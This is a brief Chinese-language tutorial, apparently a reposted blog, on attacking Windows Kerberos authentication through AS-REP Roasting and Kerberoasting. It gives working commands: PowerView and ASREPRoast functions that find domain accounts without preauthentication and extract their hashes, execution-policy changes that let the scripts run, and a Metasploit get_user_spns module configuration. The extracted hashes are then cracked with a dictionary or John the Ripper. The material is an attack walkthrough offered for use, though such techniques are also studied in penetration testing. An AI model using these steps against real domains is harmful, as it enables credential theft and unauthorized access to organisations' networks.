使用AS-REP Roasting和kerberoasting攻擊kerberos


准備工作


'''
PowerView是PowerSploit框架的一個子集,里面繼承了很多和滲透相關的powershell腳本下載地址:https://github.com/PowerShellMafia/PowerSploit
如果沒有,請下載這個連接的版本的模塊:https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1
引用模塊,可以單獨引用PowerSploit的子模塊或者引用子模塊
首先把對應的文件夾放入$Env:PsModulePath的路徑下,然后
Import-Module ModuleName(.\xxx.ps1)即可
查看引入了那些函數和過濾器可以使用
Get-Command -Module ModuleName
如果系統不支持導入模塊,可以在PS中輸入一下指令執行配置,允許配置
Set-ExecutionPolicy RemoteSigned
Set-ExecutionPolicy Unrestricted
Get-ASREPHash的部分需要用到ASREPRoast項目的功能:
https://github.com/gold1029/ASREPRoast
'''

AS-REP Roasting原理分析


原理就是通過獲取不需要預鑒權的高權限賬戶,獲取器hash值,進行爆破。這個爆破是依靠字典的,限制較多,不是很好用,首先控制一台域內的機器,然后獲取powershell的權限。

Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose

Get-ASREPHash -UserName admin02 -Domain sec.com -Verbose 

爆破


將hash值存起來,使用相關程序爆破,依靠字典

Kerberoasting攻擊kerberos


使用msf的use auxiliary/gather/get_user_spns,也可以獲得類似信息,但是注意一開始的位置是krb5tgs,而不是krb5asrep,說明這是從兩個步驟的返回報文中獲取到的hash值,可以分別進行爆破,只需要掌握一個與普通賬號、口令、域名稱、域控IP地址即可

use auxiliary/gather/get_user_spns
set rhosts x.x.x.x
set user xxx 普通用戶權限即可
set pass xxx 普通用戶權限即可
set domain xxxxx.xxx.xxx
set Threads 10
run


然后就可以使用jtr進行破解

參考文獻:

https://www.anquanke.com/post/id/85374ss
https://www.anquanke.com/post/id/87050


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM